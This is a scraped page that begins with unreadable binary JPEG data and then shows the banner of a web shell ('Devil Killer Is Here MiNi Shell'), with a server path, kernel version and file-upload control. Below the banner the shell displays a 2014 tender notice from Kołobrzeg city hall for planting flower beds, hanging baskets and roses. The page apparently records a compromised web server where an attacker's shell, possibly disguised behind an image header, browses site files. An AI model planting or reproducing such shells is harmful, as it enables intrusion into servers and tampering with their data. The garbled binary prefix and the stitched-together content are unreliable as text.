JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140314/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140314/87160-N-2014.html

<p class="kh_header"><b>Kołobrzeg: Wykonanie obsady wiosennej i letniej rabat kwiatowych, gazonów kwiatowych, ampli wiszących na lampach, wykonanie różanki oraz likwidacja kwietnika i palisady, stanowiących wyposażenie terenów zieleni miasta Kołobrzeg</b><br>
<b>Numer ogłoszenia: 87160 - 2014; data zamieszczenia: 14.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Miasta Kołobrzeg , ul. Ratuszowa 13, 78-100 Kołobrzeg, woj. zachodniopomorskie, tel. 094 3551580, faks (094) 352 37 69.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kolobrzeg.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie obsady wiosennej i letniej rabat kwiatowych, gazonów kwiatowych, ampli wiszących na lampach, wykonanie różanki oraz likwidacja kwietnika i palisady, stanowiących wyposażenie terenów zieleni miasta Kołobrzeg.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług ogrodniczych, związanych z wykonaniem I wiosennej i II letniej obsady rabat kwiatowych, gazonów kwiatowych, ampli wiszących na lampach, likwidacją kwietnika na terenie Skweru Miast Partnerskich oraz palisady kwietnika zlokalizowanego na terenie Skweru Pana Tadeusza oraz wykonaniem różanek. Zamówienie jest podzielone na 4 części:
Część 1
Część 1 element 1 - wykonanie I wiosennej obsady rabat kwiatowych zlokalizowanych na terenach zieleni miasta Kołobrzeg, w tym na terenie Skweru Miast Partnerskich, zieleńca zlokalizowanego przy wjeździe do osiedla Podczele, Parku im. Stefana Żeromskiego, przy ul. E. Gierczyk, Placu płk. Anatola Przybylskiego, Skweru 750-lecia, zieleńca przy budynku Starostwa Powiatowego, Skweru Pionierów Kołobrzegu, u podnóża latarni morskiej, łącznie na powierzchni 613,84 m2, przy wykorzystaniu szacunkowo łącznie min. 29 207  szt. roślin, w tym gatunku Senecio cruentus, Ranunculus asiaticus, Viola x wittrockiana, Bellis perennis.Część 1 element 2 - wykonanie I wiosennej obsady gazonów zlokalizowanych na terenach miasta Kołobrzeg, w tym na terenie przy głównym wejściu do Urzędu Miasta Kołobrzeg, na nadbrzeżu portowym przy ul. Morskiej, w Parku im. Stefana Żeromskiego, na terenie osiedla Podczele, przy skrzyżowaniu ul. Kniewskiego i ul. Waryńskiego, w okolicy Regionalnego Centrum Kultury, na terenie Placu płk Anatola Przybylskiego, przy 
ul. Walki Młodych 17-20, przy ul. Katedralnej 1-5, przy ul. Łopuskiego 1-5, zlokalizowanych na terenie przy ul. Dworcowa 3, przy ul. Dworcowa 2-8, przy ul. Strzelecka 4, przy ul. Michała Drzymały 9-9a - łącznie 65 szt. gazonów, przy wykorzystaniu roślin gatunku Viola x wittrockiana.
Część 2 Część 2 element 1 - Wykonanie II letniej obsady rabat kwiatowych na terenie Skweru Miast Partnerskich dz. nr 240 ob.12 -  5 kwietników o łącznej powierzchni 129,86 m2, przy wykorzystaniu szacunkowo łącznie 6 485 szt. roślin gatunku Begonia x semperflorens, Ageratum houstonianum, Tagetes patula,
Część 2 element 2 - Wykonanie II letniej obsady rabat kwiatowych na terenie Parku  im. Stefana Żeromskiego dz. nr 5 na 8 ob.4 u podnóża schodów Pomnika Zaślubin Polski z Morzem - o łącznej powierzchni 146,23 m2, przy wykorzystaniu szacunkowo łącznie min. 2 340  szt. roślin gatunku Impatiens New Guinea,Część 2 element 3 - Wykonanie II letniej obsady rabat kwiatowych na terenie Placu płk Anatola Przybylskiego dz. nr 198 ob.12 - 2 kwietniki o łącznej powierzchni 242,21 m2, przy wykorzystaniu szacunkowo łącznie min. 8 878 szt. roślin gatunku Begonia x hybrida Dragon Wing, Begonia x semperflorens,Część 3Wykonanie II letniej obsady rabat kwiatowych na terenie Parku 18 Marca dz. nr 133 ob.12- 6 kwietników 
o łącznej powierzchni 482,55 m2, przy wykorzystaniu szacunkowo łącznie min. 24 130  szt. roślin gatunku Coleus blumei lub Coleus hybryd odmiany o liściach jednolitych seledynowych, o liściach jednolitych  purpurowych oraz o liściach pstrych np. odm. Mosaic,Część 4 Część 4 element 1 - Wykonanie II letniej obsady rabat kwiatowych na innych terenach zieleni miasta Kołobrzeg - łącznie 9 kwietników  o łącznej powierzchni 187,73 m2, przy wykorzystaniu szacunkowo łącznie min. 4 500  szt. roślin gatunku  Canna × generalia, Tagetes patula, Begonia tuberhybrida, Begonia x semperflorens, Ageratum houstonianum, Impatiens New Guinea, lub Impatiens waleriana, Część 4 element 2 - wykonanie II letniej i jesiennej obsady gazonów zlokalizowanych na terenach miasta Kołobrzeg, w tym na terenie przy głównym wejściu do Urzędu Miasta Kołobrzeg, na nadbrzeżu portowym przy
 ul. Morskiej, w Parku im. Stefana Żeromskiego, na terenie osiedla Podczele, przy skrzyżowaniu ul. Kniewskiego i ul. Waryńskiego, w okolicy Regionalnego Centrum Kultury, na terenie Placu płk Anatola Przybylskiego, przy ul. Walki Młodych 17-20, przy ul. Katedralnej 1-5, przy ul. Łopuskiego 1-5, zlokalizowanych na terenie przy 
ul. Dworcowa 3, przy ul. Dworcowa 2-8, przy ul. Strzelecka 4, przy ul. Michała Drzymały 9-9a - łącznie 76 szt. gazonów, przy wykorzystaniu roślin petunii kaskadowej 3 odmian, Pelargonium peltatum, Pelargonium zonale, Begonia tuberhybrida, Część 4 element 3 - Wykonanie nasadzeń kwiatowych w amplach wiszących zlokalizowanych na terenach miasta Kołobrzeg - Łącznie 57 szt. kompletów ampli przy wykorzystaniu szacunkowo łącznie min. 684 szt. roślin, stosując Begonię kaskadową  np. z grupy  Illumination czy z grupy Milion Kisses oraz stosując petunię kaskadową 3 odmian o niebieskim kolorze kwiatów, o czerwonym kolorze kwiatów oraz białym lub kremowym kolorze kwiatów,Część 4 element 4 - Likwidacja kwietnika na terenie Skweru Miast Partnerskich oraz palisady  kwietnika zlokalizowanego na terenie Skweru Pana Tadeusza Część 4 element 5 - Wykonanie nasadzeń 685 krzewów róży okrywowej 2 odmian na terenie skweru zlokalizowanego przy skrzyżowaniu ul. E. Łopuskiego, Armii Krajowej  i ul. Dubois dz. nr 211 ob.12 oraz jej utrzymanie w okresie gwarancyjnym..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.31.00.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do postępowania o udzielenie zamówienia publicznego jest zobowiązany - przed upływem terminu składania ofert - wnieść wadium dla każdej części przedmiotu zamówienia oddzielnie w wysokości: 
1)1.000,00 zł (słownie:  jeden tysiąc złotych 00/100) dla części 1,
2)1.000,00 zł (słownie:  jeden tysiąc złotych 00/100) dla części 2,
3)1.000,00 zł (słownie:  jeden tysiąc złotych 00/100) dla części 3,
4)1.000,00 zł (słownie:  jeden tysiąc złotych 00/100) dla części 4.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek dotyczący posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli Wykonawca złoży oświadczenie z art. 22 ust.1 Ustawy Prawo Zamówień Publicznych O spełnienie warunków udziału w postępowaniu z art. 22 ust. 1 ustawy P. z. p. Zamawiający dokona oceny spełniania warunków poprze weryfikacje oświadczenia złożonego na podstawie art. 44 ustawy Prawo zamówień publicznych.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek dotyczący posiadania wiedzy   i doświadczenia, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał a w przypadku świadczeń okresowych lub ciągłych również wykonuje główne usługi, z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie. Należy przedłożyć dokument potwierdzający wykonanie minimum 1 usługi :
a) w przypadku zainteresowania realizacją części 1 przedmiotu zamówienia, tj. wykonanie I wiosennej obsady rabat kwiatowych i gazonów, potwierdzający wykonanie nasadzeń kwiatowych o wartości minimum 40 000,00 zł PLN (brutto),
b) w przypadku zainteresowania realizacją części 2 przedmiotu zamówienia, tj. wykonanie II letniej obsady rabat kwiatowych na terenie Skweru Miast Partnerskich, Parku im. Stefana Żeromskiego oraz Placu płk Anatola Przybylskiego, potwierdzający wykonanie nasadzeń kwiatowych o wartości minimum 40 000,00 zł PLN (brutto),        
c) w przypadku zainteresowania realizacją części 3 przedmiotu zamówienia, tj. wykonanie II letniej obsady rabat kwiatowych na terenie Parku 18 Marca, potwierdzający wykonanie nasadzeń kwiatowych o wartości minimum 40 000,00 zł PLN (brutto),
d) w przypadku zainteresowania realizacją części 4 przedmiotu zamówienia, tj. wykonanie II letniej obsady rabat kwiatowych i gazonów kwiatowych na innych terenach zieleni miasta Kołobrzeg, w amplach wiszących na lampach, likwidacja kwietnika na terenie Skweru Miast Partnerskich oraz palisady  kwietnika zlokalizowanego na terenie Skweru Pana Tadeusza oraz wykonanie różanki, potwierdzający wykonanie nasadzeń kwiatowych o wartości minimum 20 000,00 zł PLN (brutto) oraz potwierdzający wykonanie nasadzeń krzewów o wartości minimum 10 000,00 zł PLN (brutto).
W przypadku zainteresowania realizacją łącznie wszystkich części przedmiotu zamówienia Zamawiający uzna za spełniony warunek, jeżeli Wykonawca wykaże, iż wykonał wskazane w lit. a-d prace jako usługi wykonane dla jednego Inwestora na sumę w/w wartości lub jako usługi odrębne tj. przedłoży odrębne poświadczenia/oświadczenia na każdą z usług wymienionych w powyższych punktach (od a do d) 
o wymaganej wartości.
Zamawiający dokona oceny spełniania warunków poprzez weryfikację złożonego załącznika nr 5 do SIWZ oraz dołączonych dokumentów.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie dokonuje opisu spełniania tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek dotyczący dysponowania osobami zdolnymi do wykonywania zamówienia, jeżeli Wykonawca wykaże, że dysponuje lub będzie dysponował przynajmniej 1 osobą, która z ramienia Wykonawcy będzie nadzorować
 i odpowiadać za realizację przedmiotu zamówienia wraz z potwierdzeniem posiadania wyższego wykształcenia w dziedzinie ogrodnictwa, ogrodnictwa terenów zieleni lub architektury krajobrazu oraz wykaże zatrudnienie minimum 7 osób (z pomięciem osób nadzorujących i kierujących pracami), w zakresie każdej części przedmiotu zamówienia. W przypadku zainteresowania realizacja wszystkich 4 części przedmiotu zamówienia Oferent wykaże zatrudnienie min.15 osób. Zamawiający dokona oceny spełnienia warunków poprzez weryfikację złożonego Załącznika nr 4 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna za spełniony warunek dotyczący sytuacji ekonomicznej  i finansowej, zapewniającej wykonanie przedmiotu zamówienia, jeżeli Wykonawca, przedstawi informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Zamawiający uzna warunek za spełniony, jeżeli wykonawca wykaże się posiadaniem środków lub zdolności kredytowej :
a) w przypadku zainteresowania realizacją części 1 przedmiotu zamówienia, tj. wykonanie I wiosennej obsady rabat kwiatowych i gazonów, na kwotę minimum 50 000,00 zł PLN (brutto),
b) w przypadku zainteresowania realizacją części 2 przedmiotu zamówienia, tj. wykonanie II letniej obsady rabat kwiatowych na terenie Skweru Miast Partnerskich, Parku im. Stefana Żeromskiego oraz Placu 
płk Anatola Przybylskiego, na kwotę minimum 50 000,00 zł PLN (brutto),        
c) w przypadku zainteresowania realizacją części 3 przedmiotu zamówienia, tj. wykonanie II letniej obsady rabat kwiatowych na terenie Parku 18 Marca, na kwotę minimum 50 000,00 zł PLN (brutto),
d) w przypadku zainteresowania realizacją części 4 przedmiotu zamówienia, tj. wykonanie II letniej obsady rabat kwiatowych i gazonów kwiatowych na innych terenach zieleni miasta Kołobrzeg, w amplach wiszących na lampach, likwidacja kwietnika na terenie Skweru Miast Partnerskich oraz palisady kwietnika zlokalizowanego na terenie Skweru Pana Tadeusza oraz wykonanie różanki, na kwotę minimum 50 000,00 zł PLN (brutto) 
e) w przypadku zainteresowania realizacją łącznie części 1, 2, 3 i 4 przedmiotu zamówienia, na kwotę minimum 150 000 zł PLN (brutto),</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Wypełniony i podpisany Formularz ofertowy;
2. Dowód wniesienia wadium
3. Oświadczenie Wykonawcy, że w przypadku wyboru jego oferty zawrze umowę  z podmiotem posiadającym stosowne zezwolenia na odbiór i transport odpadów pochodzących z realizacji zamówienia.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonywania zmian umowy w zakresie zmiany terminu wykonania umowy, jeżeli wystąpiły okoliczności, których strony nie mogły przewidzieć w chwili zawarcia umowy, niezawinione przez strony, że niemożliwe stało się wykonanie przedmiotu umowy w umówionym terminie, Jeżeli na powyższe okoliczności powołuje się Wykonawca, zobowiązany jest należycie je udokumentować</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kolobrzeg.pl BIP<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Wydział Komunalny Referat Inżynierii i Ochrony Środowiska, ul. Ratuszowa 12 , 78 - 100 Kołobrzeg.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.03.2014 godzina 12:30, miejsce: Sekretariat Urzędu Miasta Kołobrzeg, ul. Ratuszowa 13, 78 - 100 Kołobrzeg (pokój nr 104, I piętro).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> wykonanie I wiosennej obsady rabat kwiatowych i gazonów.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Część 1 element 1 - wykonanie I wiosennej obsady rabat kwiatowych zlokalizowanych na terenach zieleni miasta Kołobrzeg, w tym na terenie Skweru Miast Partnerskich, zieleńca zlokalizowanego przy wjeździe do osiedla Podczele, Parku im. Stefana Żeromskiego, przy ul. E. Gierczyk, Placu płk. Anatola Przybylskiego, Skweru 750-lecia, zieleńca przy budynku Starostwa Powiatowego, Skweru Pionierów Kołobrzegu, u podnóża latarni morskiej, łącznie na powierzchni 613,84 m2, przy wykorzystaniu szacunkowo łącznie min. 29 207  szt. roślin, w tym gatunku Senecio cruentus, Ranunculus asiaticus, Viola x wittrockiana, Bellis perennis.
Część 1 element 2 - wykonanie I wiosennej obsady gazonów zlokalizowanych na terenach miasta Kołobrzeg, w tym na terenie przy głównym wejściu do Urzędu Miasta Kołobrzeg, na nadbrzeżu portowym przy ul. Morskiej, w Parku im. Stefana Żeromskiego, na terenie osiedla Podczele, przy skrzyżowaniu ul. Kniewskiego 
